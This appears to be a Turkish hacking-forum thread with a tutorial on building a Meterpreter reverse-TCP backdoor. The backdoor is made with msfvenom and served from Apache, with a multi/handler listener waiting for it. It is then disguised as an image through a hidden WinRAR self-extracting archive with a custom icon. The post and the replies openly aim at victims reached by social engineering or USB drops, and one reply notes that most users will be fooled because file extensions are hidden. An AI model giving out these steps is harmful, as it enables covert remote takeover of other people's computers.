Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.





Resim İçerisine Backdoor Yerleştirme

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 3 Hafta önce   #1
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 9
Teşekkür (Aldı): 70


Exclamation Resim İçerisine Backdoor Yerleştirme



Bu gün JPG veya PNG içerisine zaralı yazılımı nasıl gömeriz ondan bahsedeceğim. Oluşturacağımız backdoor karışı tarafta yani kurban makinada bir resim olarak gözükecek ama karşı taraf bu resmi açtığında, bizde bir session açılacak yani kurban makineye bir erişim sağlamış olacağız. Bunu msfconsole ile yapacağız. Oluşturmuş olduğumuz zaralı yazılımı winrar yardımı ile bir jpg veya png resim içerisinde gizleyeceğiz. Olay bu şekilde çok uzatmadan nasıl yapılır ona geçiyorum. Keyifli okumalar.




Zaralı yazılımımızı "msfvenom" ile oluşturuyoruz ilk önce
Kod:
msfvenom -p windows/meterpreter/_reverse_tcp LHOST:<ip> LPORT:<port> -f <dosya_uzantısı>  > dosya_adı
şeklinde bir komutla zararlı yazılımımızı oluşturmuş olduk. -F ile dosya uzantısı belirtik.

Daha sonra oluşturmuş olduğumuz zararlıyı tabi daha öncesinde konsol ekranında
Kod:
service apache2 start
diyerek apache servisini başlatmamız gerekiyor daha sonra, bu zararlıyı /home/ dizininden /var/www/html dizinine taşımamız gerekiyor.



Şimdi sıra geldi msfconsole'a. Burada artık zararlı yazılımı handle edip yani payload'ı ayarlayıp dinlemeye başlayacağız.



Burada
Kod:
use exploit/multi/handler
geçiş yaptığımızda ise payload'ımızı yüklüyoruz.
Kod:
set payload windows/meterpreter/reverse_tcp
diyerek payload'ımızı da belirttik.
Daha sonra show options diyerek ayarlamamız gereken yerlere bakıyoruz.



Kod:
set LHOST <IP>
VE
Kod:
set LPORT <PORT>
dedikten sonra işlem tamam.
Gerekli olan IP ve PORT numaralarını verdikten sonra bir daha kontrol edelim eksik bir şey var mı diye. Her şey tamam artık çalıştırabiliriz.

Şimdi exploit Diyerek bizim bu zararlı yazılım karşı taraf için dinleme moduna geçecektir.



Karşı tarafta zararlı yazılım açıldığından burası da aktif hale gelecektir.

Şuan için burada bir işimiz kalmadı. Windows tarafına geçiyoruz ve bizim sunucu üzerindeki dosyamızı indiriyoruz.

Windows makinede taracıyı açıp üst tarafa
Kod:
192.168.1.2/Office.exe
diyerek zararlı dosyamızı direkt indiriyoruz.

Sonra internet üzerinden indirin ya da sizin bilgisayarınızda bulunun, hangi amaçla yapıyorsan bunu onunla ilgili bir fotoğraf buluyoruz.

Bu resimi daha sonra JPG ya da PNG resimi conver ederek ico haline getirmemiz lazım. Google'da bunun için online iconconvert siteleri var https://icoconvert.com bu siteden elinizdeki görselleri icon versiyonlarına convert edebilirsiniz.

Bu siteye girdikten sonra ilgili dosyayı yükleyip alt tarafa inip oradan şu ayarları yapmanız gerekiyor.


Bunları yaptıktan sonra alt tarafta CONVERT ICO adlı butona convert işlemi için tıkayıp daha sonra altında download your's icon yazısı oluşacak ona tıklayıp ilgili iconu indiriyoruz.

Şimdi elimizde bir zararlı yazılım, bir resim dosyası bir de icon dosyası mevcut arkadaşlar.
Yapmamız gereken zararlı yazılım ve orjinal JPG-PNG dosyalarımızı aşşağıdaki gibi seçip sağ tıklayarak arşive ekle diyoruz.


Burada açılan yerde aşağıdaki ayarları yapıyoruz. Burada dosya adına siz istediğinizi verebilirsiniz.



Daha sonra üst taraftan gelişmişe tıklıyoruz sağ tarafta ki SFX Seçenekleri'ne tıklıyoruz Burada, Kurulum diyoruz Bu alana Dosyaların gerçek isimlerini giriyoruz uzantılarıyla beraber. Örnek aşağıdaki gibi



Daha sonra Modlar Sekmesine giriyoruz, aşağıda bulunan Tümünü Gizle seçeneğini seçiyoruz.



Daha sonra yine üst menüden Metin ve Simge 'ye tıklıyoruz burdan en allta bulunan Dosyadan SFX simgesi yükleyi seçiyoruz açılan yerden bizim oluşturmuş olduğumuz icon dosyasını seçiyoruz ve yükle diyoruz.



Bütün hepsi tamam deyip işlemleri bitiriyoruz ve kullanmak istediğimiz resim hazır buna .exe uzantısı eklemişim yanlışlıkla siz böyle hatalar yapmayın.



Karşı tarafa artık kime gönderecekseniz, sosyal mühendslik ya da USB üzerine yazırıp kullanıcı taktığı an çalışmasını sağlabilirsiniz burası sizin hayal gücünüze kalmış arkadaşlar.
Karşı taraf bunu açtığı anda sizin msfconsole da dinleme modunda olduğu için direkt olarak session düşüyor bundan sonra artık msfconsole komutları iie istediğinizi yapabilirsiniz.
Benim yazacaklarım bu kadardı arkadaşlar, sıkılmadan buraya kadar okuyan herkese çok teşekkür ederim.



___________________________________________

Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
 Offline  
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #2
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 9
Teşekkür (Aldı): 70




Alıntı:
Par4d0x1D´isimli üyeden Alıntı Mesajı göster
A wise man once said: Yok öyle bir dünya. Konu içeriği ile başlık fazlasıyla uyumsuz.
Peki neden böyle düşünüyorsun hatam ya da eksiğim varsa söyle de düzelteyim ?



___________________________________________

Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
 Offline  
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #3
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 9
Teşekkür (Aldı): 70




Alıntı:
Par4d0x1D´isimli üyeden Alıntı Mesajı göster
SFX arşivi mimarisine, mantığına ve maksadına ilişkin bilgin yetersiz. Belli ki olayı yanlış yorumlamışsın, bu biçim bir eleştirimin tek sebebi bu. İlgili işlem vasıtasıyla görsel içeriğe ilişkin dosya uzantısına sahip bir imajın içerisine derlenmiş betik yerleştirmiyorsun, bu oldukça kritik bir güvenlik zafiyeti teşkil eder idi. Apayrı bir dosya tipi oluşturuyorsun, ve uzantısı da görsel içeriğe ait olmuyor. Yaratın olan dosyaya ait teknik detaylara internet üstünden erişebilirsin.
Doğru SFX mimarisi hakkında bilgim yetersiz, değerli yorumların için çok teşekkür ederim bunları dikkate alacağım.



___________________________________________

Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
 Offline  
 
Alıntı ile Cevapla
Alt 4 Gün önce   #4
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2013
Nereden
Remote Pc
Mesajlar
Konular

Teşekkür (Etti): 15
Teşekkür (Aldı): 54




virtual machine üzerinden kullanılacak olursa windows makinenin mi yoksa virtual machinenin mi ipsi gerekli ?
 Offline  
 
Alıntı ile Cevapla
Alt 4 Gün önce   #5
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 9
Teşekkür (Aldı): 70




Alıntı:
cofidik´isimli üyeden Alıntı Mesajı göster
virtual machine üzerinden kullanılacak olursa windows makinenin mi yoksa virtual machinenin mi ipsi gerekli ?
Merhaba.

Virtual Machine üzerinde de bu işlemleri bir fark olmadan kullanabilirsiniz. LHOST sizin, yani kali linux makinenin ip'si. Çünkü reverse shell aldığınız zaman oturumun bu ip üzerinden açılması gerekiyor farklı bir yerde açılmasını isterseniz o cihazın da ip'sini verebilirsiniz. Kısaca virtual machine ip'si vermeniz gerekiyor.



___________________________________________

Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
 Offline  
 
Alıntı ile Cevapla
Alt 4 Gün önce   #6
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2013
Nereden
Remote Pc
Mesajlar
Konular

Teşekkür (Etti): 15
Teşekkür (Aldı): 54




Anladım aynı anda farklı yerlerde de kullanmak istemiştim fakat virtual machine ile idare edeceğiz teşekkür ederim verdiğin bilgi için.
 Offline  
 
Alıntı ile Cevapla
Alt 8 Saat önce   #7
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
05/2019
Mesajlar
2
Konular
0

Teşekkür (Etti): 0
Teşekkür (Aldı): 0




mehrabalar ama tam anlayamadım EXE uzantılı nasıl resım ıcerısıne atıyoruz kafam karıstı
 Offline  
 
Alıntı ile Cevapla
Alt 8 Saat önce   #8
  • Geliştirici
  • Üye Bilgileri
Üyelik tarihi
07/2015
Nereden
Ankara
Mesajlar
Konular

Teşekkür (Etti): 1761
Teşekkür (Aldı): 3940




Alıntı:
MRL´isimli üyeden Alıntı Mesajı göster
mehrabalar ama tam anlayamadım EXE uzantılı nasıl resım ıcerısıne atıyoruz kafam karıstı
Atmıyoruz, başlık azıcık hatalı, orada işe sosyal mühendislik giriyor... Eninde sonunda oluşan dosya .exe oluyor gördüğün gibi. Sadece resim gibi davranıyor ve görünüyor.

İnsanların yüzde doksanı "dosya uzantılarını göster" seçeneğini kullanmadığından aradaki farkı anlamayacaklardır. Yani çoğu insan yiyecektir.

....

Konuya yorum; adım adım anlatmışsın üstad. Ellerine sağlık.



___________________________________________

Gayrıresmi Trolleme Kulübü Kurucu Üyesi...

Sii Şarp: 430%
Site yapmah: 386%
Piieyçpii: 396.8%
Cava: 205%
Andıroyid: 37.9²%
Nodjiies: 196%
Sii artı artı: 342.333333334%
Yuniti: 154%
Paytın 304%
Bat dosyasıyla hedef çökertme: 96i+382√17%

 Offline  
 
Alıntı ile Cevapla
Alt 7 Saat önce   #9
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 9
Teşekkür (Aldı): 70




Alıntı:
zztri´isimli üyeden Alıntı Mesajı göster
Atmıyoruz, başlık azıcık hatalı, orada işe sosyal mühendislik giriyor... Eninde sonunda oluşan dosya .exe oluyor gördüğün gibi. Sadece resim gibi davranıyor ve görünüyor.

İnsanların yüzde doksanı "dosya uzantılarını göster" seçeneğini kullanmadığından aradaki farkı anlamayacaklardır. Yani çoğu insan yiyecektir.

....

Konuya yorum; adım adım anlatmışsın üstad. Ellerine sağlık.
Hocamızın da dediği gibi azıcık başlık hatalı, .exe dosyasını resim formatın da gösteriyoruz sadece. Değerli yorumunuz için çok teşekkür ederim hocam.



___________________________________________

Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau